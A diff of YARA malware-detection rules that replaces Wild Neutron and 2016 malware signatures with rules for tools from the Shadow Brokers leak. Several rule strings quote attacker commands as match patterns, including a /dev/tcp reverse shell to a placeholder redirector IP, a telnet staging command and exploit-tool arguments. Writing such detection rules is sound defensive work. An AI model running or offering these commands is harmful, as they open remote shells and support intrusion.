-		hash = "b4005530193bc523d3e0193c3c53e2737ae3bf9f76d12c827c0b5cd0dcbaae45"
-		logic_hash = "4882b7c5f469615436490cd628ee3bb5b0dded43fb556ac6477cdadc6c8eff05"
-		score = 60
+		logic_hash = "c3f9f90f83f3672b101e52f36012c485c29840cf0b2ced00087fb27725fd1545"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "9c400aab74e75be8770387d35ca219285e2cedc0c7895225bbe567ce9c9dc078"
 
 	strings:
-		$x1 = "WinRAT-Win32-Release.exe" fullword ascii
-		$s0 = "rundll32.exe \"%s\",#1" fullword wide
-		$s1 = "RtlUpd.EXE" fullword wide
-		$s2 = "RtlUpd.exe" fullword wide
-		$s3 = "Driver Update and remove for Windows x64 or x86_32" fullword wide
-		$s4 = "Realtek HD Audio Update and remove driver Tool" fullword wide
-		$s5 = "%s%s%s=%d,%s=%d,%s=%d," fullword wide
-		$s6 = "Key Usage" fullword ascii
-		$s7 = "id-at-serialNumber" fullword ascii
+		$x2 = "packrat -z RAT_REMOTE_NAME" fullword ascii
+		$s3 = "./client -t TIME_ADJ SPECIAL_SOURCE_PORT 127.0.0.1 TARG_PORT" ascii
+		$s4 = "mkdir TEMP_DIR; cd TEMP_DIR; cat < /dev/tcp/REDIR_IP/RED" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1240KB and all of them
+		1 of them
 }
-rule SIGNATURE_BASE_Wildneutron_Sample_5 : FILE
+rule SIGNATURE_BASE_FVEY_Shadowbroker_User_Tool_Ebbisland
 {
 	meta:
-		description = "Wild Neutron APT Sample Rule"
+		description = "Auto-generated rule - file user.tool.ebbisland.COMMON"
 		author = "Florian Roth (Nextron Systems)"
-		id = "0df63255-155d-56b9-b86b-491855983095"
-		date = "2015-07-10"
+		id = "fd312ba2-d590-5007-875c-008553c2b1b9"
+		date = "2016-12-17"
 		modified = "2023-12-05"
-		reference = "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_wildneutron.yar#L110-L133"
+		reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_fvey_shadowbroker_dec16.yar#L244-L258"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "1604e36ccef5fa221b101d7f043ad7f856b84bf1a80774aa33d91c2a9a226206"
-		logic_hash = "57792a54c96c59a1e9ed961715c72187936aee6f001c2ed4f95ca84e799e9c8c"
-		score = 60
+		logic_hash = "0a45ea3cd6aeea9299ef67ae82c9f4bf929a961695e7cce344aa1737fa4c07b0"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "390e776ae15fadad2e3825a5e2e06c4f8de6d71813bef42052c7fd8494146222"
 
 	strings:
-		$s0 = "LiveUpdater.exe" fullword wide
-		$s1 = "id-at-postalAddress" fullword ascii
-		$s2 = "%d -> %d (default)" fullword wide
-		$s3 = "%s%s%s=%d,%s=%d,%s=%d," fullword wide
-		$s4 = "sha-1WithRSAEncryption" fullword ascii
-		$s5 = "Postal code" fullword ascii
-		$s6 = "id-ce-keyUsage" fullword ascii
-		$s7 = "Key Usage" fullword ascii
-		$s8 = "TLS-RSA-WITH-3DES-EDE-CBC-SHA" fullword ascii
-		$s9 = "%02d.%04d.%s" fullword wide
+		$x1 = "-t 127.0.0.1 -p SERVICE_TCP_PORT -r TARGET_RPC_SERVICE -X"
+		$x2 = "-N -A SPECIFIC_SHELLCODE_ADDRESS" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of them
+		1 of them
 }
-rule SIGNATURE_BASE_Wildneutron_Sample_6 : FILE
+rule SIGNATURE_BASE_FVEY_Shadowbroker_User_Tool_Stoicsurgeon
 {
 	meta:
-		description = "Wild Neutron APT Sample Rule"
+		description = "Auto-generated rule - file user.tool.stoicsurgeon.COMMON"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c5d87cad-d1ca-5766-90c1-fc8ecfa3f14f"
-		date = "2015-07-10"
+		id = "2ff22b17-4922-54d7-bbd8-a5ff40b6ebe5"
+		date = "2016-12-17"
 		modified = "2023-12-05"
-		reference = "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_wildneutron.yar#L135-L149"
+		reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_fvey_shadowbroker_dec16.yar#L260-L273"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "4bd548fe07b19178281edb1ee81c9711525dab03dc0b6676963019c44cc75865"
-		logic_hash = "7dc7f9815f2b2c934ecf93f5813bdb87364b2b9e2a5aebc04f76cfff43e46d30"
-		score = 60
+		logic_hash = "322599ba7d5536b7f0856980a6caab86de66c02da75bf55e97bf129d08c43031"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "967facb19c9b563eb90d3df6aa89fd7dcfa889b0ba601d3423d9b71b44191f50"
 
 	strings:
-		$s0 = "mshtaex.exe" fullword wide
+		$x1 = "echo -n TARGET_HOSTNAME  | sed '/\\n/!G;s/\\(.\\)\\(.*\\n\\)/&\\2\\1/;//D;s/.//'" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 310KB and all of them
+		1 of them
 }
-rule SIGNATURE_BASE_Wildneutron_Sample_7 : FILE
+rule SIGNATURE_BASE_FVEY_Shadowbroker_User_Tool_Elgingamble
 {
 	meta:
-		description = "Wild Neutron APT Sample Rule"
+		description = "Auto-generated rule - file user.tool.elgingamble.COMMON"
 		author = "Florian Roth (Nextron Systems)"
-		id = "22561c55-4294-50c9-a9b9-7b4ed98eec09"
-		date = "2015-07-10"
+		id = "344e5d5e-9fd6-5a32-ba98-945f5a35a116"
+		date = "2016-12-17"
 		modified = "2023-12-05"
-		reference = "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_wildneutron.yar#L151-L176"
+		reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_fvey_shadowbroker_dec16.yar#L275-L288"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "a14d31eb965ea8a37ebcc3b5635099f2ca08365646437c770212d534d504ff3c"
-		logic_hash = "8a081932be8fd03c37a87486570a02a31756ba6bd125dbed7da9703197447ea5"
-		score = 60
+		logic_hash = "2f4dd668c59244e92ebfe0e2fc2859b2376cf1dd6fc6522e8f452787aa96365f"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "4130284727ddef4610d63bfa8330cdafcb6524d3d2e7e8e0cb34fde8864c8118"
 
 	strings:
-		$s0 = "checking match for '%s' user %s host %s addr %s" fullword ascii
-		$s1 = "PEM_read_bio_PrivateKey failed" fullword ascii
-		$s2 = "usage: %s [-ehR] [-f log_facility] [-l log_level] [-u umask]" fullword ascii
-		$s3 = "%s %s for %s%.100s from %.200s port %d%s" fullword ascii
-		$s4 = "clapi32.dll" fullword ascii
-		$s5 = "Connection from %s port %d" fullword ascii
-		$s6 = "/usr/etc/ssh_known_hosts" fullword ascii
-		$s7 = "Version: %s - %s %s %s %s" fullword ascii
-		$s8 = "[-] connect()" fullword ascii
-		$s9 = "/bin/sh /usr/etc/sshrc" fullword ascii
-		$s10 = "kexecdhs.c" fullword ascii
-		$s11 = "%s: setrlimit(RLIMIT_FSIZE, { 0, 0 }): %s" fullword ascii
+		$x2 = "### Local exploit for" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 5000KB and all of them
+		1 of them
 }
-rule SIGNATURE_BASE_Wildneutron_Sample_9 : FILE
+rule SIGNATURE_BASE_FVEY_Shadowbroker_README_Cup
 {
 	meta:
-		description = "Wild Neutron APT Sample Rule"
+		description = "Auto-generated rule - file README.cup.NOPEN"
 		author = "Florian Roth (Nextron Systems)"
-		id = "dbfdbe8c-4a4a-5512-a03d-e9f80c853d48"
-		date = "2015-07-10"
-		modified = "2023-01-06"
-		reference = "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_wildneutron.yar#L203-L223"
+		id = "876f3d99-cc6d-568a-a202-1b4938436303"
+		date = "2016-12-17"
+		modified = "2023-12-05"
+		reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_fvey_shadowbroker_dec16.yar#L290-L304"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "781eb1e17349009fbae46aea5c59d8e5b68ae0b42335cb035742f6b0f4e4087e"
-		logic_hash = "2029c94088e075cbcbae8d7d514cfc56add022d8776e59f04824d9ce9fd12794"
-		score = 60
+		logic_hash = "bd05a23ce29be88c1a459358c984e1317cf56d21e5b378624af644fb2b41931d"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "98aaad31663b89120eb781b25d6f061037aecaeb20cf5e32c36c68f34807e271"
 
 	strings:
-		$s0 = "http://get.adobe.com/flashplayer/" wide
-		$s4 = " Player Installer/Uninstaller" fullword wide
-		$s5 = "Adobe Flash Plugin Updater" fullword wide
-		$s6 = "uSOFTWARE\\Adobe" fullword wide
-		$s11 = "2008R2" fullword wide
-		$s12 = "%02d.%04d.%s" fullword wide
-		$s13 = "%d -> %d" fullword wide
+		$s3 = "-F file(s)   Full path to target's \"fuser\" program." fullword ascii
+		$s4 = "done after the RAT is killed." fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1477KB and all of them
+		1 of them
 }
-rule SIGNATURE_BASE_Wildneutron_Sample_10 : FILE
+rule SIGNATURE_BASE_FVEY_Shadowbroker_Nopen_Oneshot
 {
 	meta:
-		description = "Wild Neutron APT Sample Rule"
+		description = "Auto-generated rule - file oneshot.example"
 		author = "Florian Roth (Nextron Systems)"
-		id = "5654a36f-8502-5e18-b8f3-94d4add466a7"
-		date = "2015-07-10"
+		id = "6a6b5426-f559-5668-a2ed-982801933302"
+		date = "2016-12-17"
 		modified = "2023-12-05"
-		reference = "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_wildneutron.yar#L225-L267"
+		reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_fvey_shadowbroker_dec16.yar#L306-L319"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "1d3bdabb350ba5a821849893dabe5d6056bf7ba1ed6042d93174ceeaa5d6dad7"
-		logic_hash = "b282b6892f9cb6769bf0e302deaa8062fd69bfd51144bc06fc9501fde9537dae"
-		score = 60
-		quality = 83
-		tags = "FILE"
+		logic_hash = "19aa32aafaaccc6697bbaff642d996554eccf2261d23071cfb8599ea0eea628b"
+		score = 75
+		quality = 85
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "a85b260d6a53ceec63ad5f09e1308b158da31062047dc0e4d562d2683a82bf9a"
 
 	strings:
-		$n1 = "/c for /L %%i in (1,1,2) DO ping 127.0.0.1 -n 3 & type %%windir%%\\notepad.exe > %s & del /f %s" fullword ascii
-		$s1 = "%SYSTEMROOT%\\temp\\_dbg.tmp" fullword ascii
-		$s2 = "%SYSTEMROOT%\\SysWOW64\\mspool.dll" fullword ascii
-		$s3 = "%SYSTEMROOT%\\System32\\dpcore16t.dll" fullword ascii
-		$s4 = "%SYSTEMROOT%\\System32\\wdigestEx.dll" fullword ascii
-		$s5 = "%SYSTEMROOT%\\System32\\mspool.dll" fullword ascii
-		$s6 = "%SYSTEMROOT%\\System32\\kernel32.dll" fullword ascii
-		$s7 = "%SYSTEMROOT%\\SysWOW64\\iastor32.exe" fullword ascii
-		$s8 = "%SYSTEMROOT%\\System32\\msvcse.exe" fullword ascii
-		$s9 = "%SYSTEMROOT%\\System32\\mshtaex.exe" fullword ascii
-		$s10 = "%SYSTEMROOT%\\System32\\iastor32.exe" fullword ascii
-		$s11 = "%SYSTEMROOT%\\SysWOW64\\mshtaex.exe" fullword ascii
-		$x1 = "wdigestEx.dll" fullword ascii
-		$x2 = "dpcore16t.dll" fullword ascii
-		$x3 = "mspool.dll" fullword ascii
-		$x4 = "msvcse.exe" fullword ascii
-		$x5 = "mshtaex.exe" fullword wide
-		$x6 = "iastor32.exe" fullword ascii
-		$y1 = "Installer.exe" fullword ascii
-		$y2 = "Info: Process %s" fullword ascii
-		$y3 = "Error: GetFileTime %s 0x%x" fullword ascii
-		$y4 = "Install succeeded" fullword ascii
-		$y5 = "Error: RegSetValueExA 0x%x" fullword ascii
+		$s1 = "/sbin/sh -c (mkdir /tmp/.X11R6; cd /tmp/.X11R6 && telnet" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 400KB and ( $n1 or ( 1 of ( $s* ) and 1 of ( $x* ) and 3 of ( $y* ) ) )
+		1 of them
 }
-rule SIGNATURE_BASE_APT_MAL_Wildneutron_Javacpl : FILE
+rule SIGNATURE_BASE_FVEY_Shadowbroker_User_Tool_Earlyshovel
 {
 	meta:
-		description = "Wild Neutron APT Sample Rule"
+		description = "Auto-generated rule - file user.tool.earlyshovel.COMMON"
 		author = "Florian Roth (Nextron Systems)"
-		id = "de82827e-61d4-559e-886a-78d5293ab141"
-		date = "2015-07-10"
-		modified = "2023-01-06"
-		old_rule_name = "WildNeutron_javacpl"
-		reference = "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_wildneutron.yar#L272-L300"
+		id = "d2640f9f-8934-5095-9c30-f24941685c9e"
+		date = "2016-12-17"
+		modified = "2023-12-05"
+		reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_fvey_shadowbroker_dec16.yar#L321-L334"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c9cb6ab956d29df9f59520262ab308a0256747cc3c898979347304950e093098"
-		score = 60
+		logic_hash = "396810b439ac53f393ad37a8acbd7236f8325730c75c1a6339e4c6343ecade7a"
+		score = 75
 		quality = 85
-		tags = "FILE"
-		hash1 = "683f5b476f8ffe87ec22b8bab57f74da4a13ecc3a5c2cbf951999953c2064fc9"
-		hash2 = "758e6b519f6c0931ff93542b767524fc1eab589feb5cfc3854c77842f9785c92"
-		hash3 = "8ca7ed720babb32a6f381769ea00e16082a563704f8b672cb21cf11843f4da7a"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "504e7a376c21ffbfb375353c5451dc69a35a10d7e2a5d0358f9ce2df34edf256"
 
 	strings:
-		$s1 = "RunFile: couldn't find ShellExecuteExA/W in SHELL32.DLL!" ascii fullword
-		$s2 = "cmdcmdline" wide fullword
-		$s3 = "\"%s\" /K %s" wide fullword
-		$s4 = "Process is not running any more" wide fullword
-		$s5 = "dpnxfsatz" wide fullword
-		$op1 = { ff d6 50 ff 15 ?? ?? 43 00 8b f8 85 ff 74 34 83 64 24 0c 00 e8 ?? ?? 02 00 }
-		$op2 = { b8 02 00 00 00 01 45 80 01 45 88 6a 00 47 52 89 7d 8c 03 d8 }
-		$op3 = { 8b c7 f7 f6 46 89 b5 c8 fd ff ff 0f b7 c0 8b c8 0f af ce 3b cf }
+		$x1 = "--tip 127.0.0.1 --tport 2525 --cip REDIRECTOR_IP --cport RANDOM_PORT" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 5MB and ( all of ( $s* ) or all of ( $op* ) )
+		1 of them
 }
-rule SIGNATURE_BASE_Unspecified_Malware_Oct16_A : FILE
+rule SIGNATURE_BASE_FVEY_Shadowbroker_User_Tool_Envisioncollision
 {
 	meta:
-		description = "Detects an unspecififed malware - October 2016"
+		description = "Auto-generated rule - file user.tool.envisioncollision.COMMON"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f62ecf7e-2b66-5567-9bf3-3d3797bc582d"
-		date = "2016-10-08"
+		id = "a738e270-a3ea-5d38-8933-797d1bd9036a"
+		date = "2016-12-17"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_malware_set_oct16.yar#L10-L46"
+		reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_fvey_shadowbroker_dec16.yar#L336-L352"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "d71e6640be1b10790d49c084b9ba248e35a6a56dfe9c5a3f219a209024ebec27"
-		score = 80
+		logic_hash = "36b2a20ef3a6540a686d7f52c8c885842fd84ba7c7daa74c21e241e25826030e"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "d112a7e21902287e4a37112bf17d7c73a7b206e7bc81780fd87991c1519f38c8"
+		hash1 = "2f04f078a8f0fdfc864d3d2e37d123f55ecc1d5e401a87eccd0c3846770f9e02"
 
 	strings:
-		$x1 = "%s\\system32\\%s.dll" fullword ascii
-		$x2 = "%SystemRoot%\\System32\\svch%s -k nets" fullword ascii
-		$x3 = "\\\\.\\pipe\\96DBA249-E88E-4c47-98DC-E18E6E3E3E5A" fullword ascii
-		$s1 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options" fullword ascii
-		$s2 = "boottemp.exe" fullword ascii
-		$s3 = "at \\\\%s %d:%d C:\\%s.exe" fullword ascii
-		$s4 = "cryptcom.dll" fullword ascii
-		$s5 = "Wininet.dll" fullword ascii
-		$s6 = "\\\\%s\\%s\\%s.exe" fullword ascii
-		$s7 = "%s%d.exe" fullword ascii
-		$s8 = "booter.exe" fullword ascii
-		$s9 = "\\\\%s\\pipe%s" fullword ascii
-		$s10 = "C:\\DelInfo.bin" fullword ascii
-		$op0 = { ae 44 00 00 cb 44 00 00 dc 44 00 00 f5 44 00 00 }
-		$op1 = { ae 44 00 00 cb 44 00 00 dc 44 00 00 f5 44 00 00 }
-		$op2 = { ee 11 74 cf 73 0b 91 c4 c9 57 b2 d9 36 86 a5 b4 }
+		$x1 = "-i<IP> -p<port> -U<user> -P<password> -D<directory> -c<commands>" fullword ascii
+		$x2 = "sh</dev/tcp/REDIR_IP/SHELL_PORT>&0" fullword ascii
+		$x3 = "-n ENVISIONCOLLISION" ascii
+		$x4 = "-UADMIN -PPASSWORD -i127.0.0.1 -Dipboard" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( 2 of ( $x* ) or 3 of ( $s* ) or all of ( $op* ) ) ) or ( 6 of them )
+		1 of them
 }
-rule SIGNATURE_BASE_Sality_Malware_Oct16 : FILE
+rule SIGNATURE_BASE_FVEY_Shadowbroker_Gen_Readme1
 {
 	meta:
-		description = "Detects an unspecififed malware - October 2016"
+		description = "Auto-generated rule"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7bf2a818-f7ee-587e-b22e-b557251d89e1"
-		date = "2016-10-08"
+		id = "1f5e3ab1-e0d1-589e-8c18-60c4ad07ee6e"
+		date = "2016-12-17"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_malware_set_oct16.yar#L48-L63"
+		reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_fvey_shadowbroker_dec16.yar#L356-L372"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "5bf14bbb0a7298a7bc896029c4b92ef9adf24307e4d05dcf86a518b266d1c2a8"
-		score = 80
+		logic_hash = "171d3df191e5c9ae4a4afc3a878cc25548238046b8c4c52dbb9ca4431aae45b0"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "8eaff5e1d4b55dd6e25f007549271da10afd1fa25064d7105de0ca2735487aad"
+		super_rule = 1
+		hash1 = "4b236b066ac7b8386a13270dcb7fdff2dda81365d03f53867eb72e29d5e496de"
+		hash2 = "64c24bbf42f15dcac04371aef756feabb7330f436c20f33cb25fbc8d0ff014c7"
+		hash3 = "a237a2bd6aec429f9941d6de632aeb9729880aa3d5f6f87cf33a76d6caa30619"
 
 	strings:
-		$s1 = "Hello world!" fullword wide
-		$s2 = "[LordPE]" fullword ascii
+		$x1 = "ls -latr /tp/med/archive/collect/siemens_msc_isb01/.tmp_ncr/*.MSC | head -10" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them )
+		1 of them
 }
-rule SIGNATURE_BASE_Unspecified_Malware_Oct16_C : FILE
+rule SIGNATURE_BASE_FVEY_Shadowbroker_Gen_Readme2
 {
 	meta:
-		description = "Detects an unspecififed malware - October 2016"
+		description = "Auto-generated rule - from files user.tool.orleansstride.COMMON, user.tool.curserazor.COMMON"
 		author = "Florian Roth (Nextron Systems)"
-		id = "fff98097-a19a-59aa-bece-837c75b0995c"
-		date = "2016-10-08"
+		id = "5959d881-2989-582c-abe2-48c76ce0e995"
+		date = "2016-12-17"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_malware_set_oct16.yar#L65-L80"
+		reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_fvey_shadowbroker_dec16.yar#L374-L389"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "1f212ef700e77c82954d997beef1157835da38330b583d02df418e10b6c182ee"
-		score = 80
+		logic_hash = "eb68c415d64d1db3d4bb0f4ad994bd050cb2287e4dc7b3ac57549f818a7914d8"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "a451157f75627b2fef3d663946c94ef7dacb58f08b31d0ec4c0a542a1c4e6205"
+		super_rule = 1
+		hash1 = "18dfd74c3e0bfb1c21127cf3382ba1d9812efdf3e992bd666d513aaf3519f728"
+		hash2 = "f4b728c93dba20a163b59b4790f29aed1078706d2c8b07dc7f4e07a6f3ecbe93"
 
 	strings:
-		$s1 = "dUSER32.DLL" fullword wide
-		$s2 = "output.dll" fullword ascii
+		$x1 = "#####  Upload the encrypted phone list as awk, modify each parser command to have the" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 5000KB and all of them )
+		1 of them
 }
-rule SIGNATURE_BASE_Bladabindi_Malware_B64 : FILE
+rule SIGNATURE_BASE_FVEY_Shadowbroker_Gen_Readme3
 {
 	meta:
-		description = "Detects Bladabindi Malware using Base64 encoded strings"
+		description = "Auto-generated rule"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7f7023be-b6e1-5e1b-af8a-c413a5438ec8"
-		date = "2016-10-08"
+		id = "41cfbf66-fb7d-5815-939f-06b23dfae746"
+		date = "2016-12-17"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_malware_set_oct16.yar#L91-L108"
+		reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_fvey_shadowbroker_dec16.yar#L391-L411"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "081a6361e29fc231f1467b837c51a39b8cccf8caa20844b22d469ce2bbd0c7fb"
+		logic_hash = "968ec80f26750ac734ad9e296b5afb35867f6c53de1e88f7c8af78daeac24b61"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "dda668b0792b7679979e61f2038cf9a8ec39415cc161be00d2c8301e7d48768d"
+		super_rule = 1
+		hash1 = "18dfd74c3e0bfb1c21127cf3382ba1d9812efdf3e992bd666d513aaf3519f728"
+		hash2 = "4b236b066ac7b8386a13270dcb7fdff2dda81365d03f53867eb72e29d5e496de"
+		hash3 = "3fe78949a9f3068db953b475177bcad3c76d16169469afd72791b4312f60cfb3"
+		hash4 = "64c24bbf42f15dcac04371aef756feabb7330f436c20f33cb25fbc8d0ff014c7"
+		hash5 = "a237a2bd6aec429f9941d6de632aeb9729880aa3d5f6f87cf33a76d6caa30619"
+		hash6 = "89748906d1c574a75fe030645c7572d7d4145b143025aa74c9b5e2be69df8773"
+		hash7 = "f4b728c93dba20a163b59b4790f29aed1078706d2c8b07dc7f4e07a6f3ecbe93"
 
 	strings:
-		$s1 = "XHN5c3RlbTMyXA==" fullword ascii
-		$s2 = "RXhlY3V0ZSBFUlJPUg==" fullword ascii
-		$s3 = "dHJvamFuLmV4ZQ==" fullword ascii
-		$s4 = "VXBkYXRlIEVSUk9S" fullword ascii
-		$s5 = "RG93bmxvYWQgRVJST1I=" fullword ascii
+		$s3 = ":%s/CRYPTKEY/CRYPTKEY/g" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 700KB and 1 of them
+		1 of them
 }
-rule SIGNATURE_BASE_Dorkbot_Injector_Malware : FILE
+rule SIGNATURE_BASE_FVEY_Shadowbroker_Gen_Readme4
 {
 	meta:
-		description = "Detects Darkbot Injector"
+		description = "Auto-generated rule - from files violetspirit.README, violetspirit.README"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b32986fe-d6f1-55f2-8d50-bc348b52fb49"
-		date = "2016-10-08"
+		id = "9e84e4ab-f74a-59e5-aee2-408a68cd673f"
+		date = "2016-12-17"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_malware_set_oct16.yar#L110-L129"
+		reference = "https://bit.no.com:43110/theshadowbrokers.bit/post/message6/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_fvey_shadowbroker_dec16.yar#L413-L429"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "36138520b0d39dc311b8e9355d1d1c215908a5fe1c01eec76c689f7e74a84303"
+		logic_hash = "c19c77d7e7e26e01a9a50fd67cc0a7fd05069def878bf18726c3e115df307cb2"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "bc3c5ac7180c8ac21d6908d747aa6122154d2bb51bb99ff0e0b1c65088d275dc"
+		super_rule = 1
+		hash1 = "a55fec73595f885e43b27963afb17aee8f8eefe811ca027ef0d7721d073e67ea"
+		hash2 = "a55fec73595f885e43b27963afb17aee8f8eefe811ca027ef0d7721d073e67ea"
 
 	strings:
-		$s1 = "Enter an integer, a real number, a character and a string : " fullword ascii
